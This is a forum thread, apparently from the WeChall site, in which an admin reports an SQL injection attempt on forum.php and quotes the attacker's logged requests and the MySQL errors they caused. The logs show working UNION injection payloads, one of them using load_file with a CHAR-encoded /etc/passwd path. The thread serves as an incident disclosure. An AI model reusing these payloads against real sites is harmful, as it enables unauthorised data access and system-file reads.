Hacking attempt
Today someone tried to hack around a bit :)

The attacker was successfully trying to inject MySQL code and made forum.php behave differently.
Luckily I checked the log for the first time in a long while, just at the moment the attacker was trying to exploit it.

While the hacker tried variations of malicious input, I uploaded a patch and checked all SQL queries for similar weaknesses. (I was lucky this time ;)

If someone is interested, I will post some of the injections here.

Btw: the WeChall source code is available as wechall.zip, but it is not always very current.
The geeks shall inherit the properties and methods of object earth.
I think everybody is interested in the injections :)
This is a quote from our logfiles; IPs have been removed.

Unknown User accessed /forum.php?action=showthread&boardid=14&threadid=NULL%20UNION%20SELECT%201,2,3%20FROM%20lol--

Error:MySqlError(1146) in query 'SELECT *, `challid` AS `foo` FROM `threads` WHERE `threadid`=NULL UNION SELECT 1,2,3 FROM lol-- AND (`challid`='0' OR (SELECT `challid` FROM `solved` WHERE `userid`='0' AND `challid`=`foo`)) LIMIT 1': Table 'gizmore_wechall.lol' doesn't exist.
-------------------------------------------------
Unknown User accessed /forum.php?action=showthread&boardid=14&threadid=NULL%20UNION%20SELECT%201,2,3,4%20FROM%20users--

Error:MySqlError(1222) in query 'SELECT *, `challid` AS `foo` FROM `threads` WHERE `threadid`=NULL UNION SELECT 1,2,3,4 FROM users-- AND (`challid`='0' OR (SELECT `challid` FROM `solved` WHERE `userid`='0' AND `challid`=`foo`)) LIMIT 1': The used SELECT statements have a different number of columns.
------------------
Now he was trying to guess the number of returned columns.
Btw: MySQL errors were reported to the attacker as shown in the logs.
-------------------
Unknown User accessed /forum.php?action=showthread&boardid=14&threadid=NULL%20UNION%20SELECT%20username,username,username,username,username,username,username,username,username,username,username%20FROM%20users--

Error:MySqlError(1054) in query 'SELECT COUNT(*) FROM `posts` WHERE `threadid`=alt3rn4tiv3 LIMIT 1': Unknown column 'alt3rn4tiv3' in 'where clause'.
-------------------
The one above looks really weird to me, and I am clueless why "alt3rn4tiv3" is shown :s
------------------------------
Unknown User accessed /forum.php?action=showthread&boardid=14&threadid=NULL%20UNION%20SELECT%20load_file(CHAR(47,%20101,%20116,%2099,%2047,%20112,%2097,%20115,%20115,%20119,%20100,%2047)),2,3,4,username,username,username,username,username,username,username%20FROM%20users%20WHERE%20userid%20=%2081--

Error:MySqlError(1064) in query 'SELECT COUNT(*) FROM `posts` WHERE `threadid`= LIMIT 1': You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1.
-----------------------------
And this one was the last for now :)
I hope I really got lucky and no harm was caused.

Greets
Gizmore
The geeks shall inherit the properties and methods of object earth.
haha, yeah it was me :)

The idea of a `hacking` site vulnerable to SQL injections is just very eye-opening about the knowledge of site owners...

Work on your security before you open a hacking site, k?

Here is my site: darkmindz.com; you should check it out for... real hacking deals, I guess...

Anyways, keep up the good work, security, etc., and have a good day.
/me slaps Gizmore around a bit with the frozen trout
Kender:
@romeo: this is not a hacking site :)
We do welcome attempts to find bugs & vulnerabilities, just let us know when you find something.

We're not professional PHP coders and can use all the help we can get.
Z:
RoMeO pwned:
http://stashbox.org/755566/antisec.txt
Last edited by Z - Jan 02, 2010 - 22:01:23
busyr:
Nice article.
I really enjoyed reading that. Bit over the top maybe, but still, it's never so funny when you are on the receiving end, eh?
And it's funny that the guy found some SQLi here and got caught by accident :P

It was quite exciting when he was doing the injections while I was patching it, nice timing :)

Meanwhile, WeChall should be quite secure.
The geeks shall inherit the properties and methods of object earth.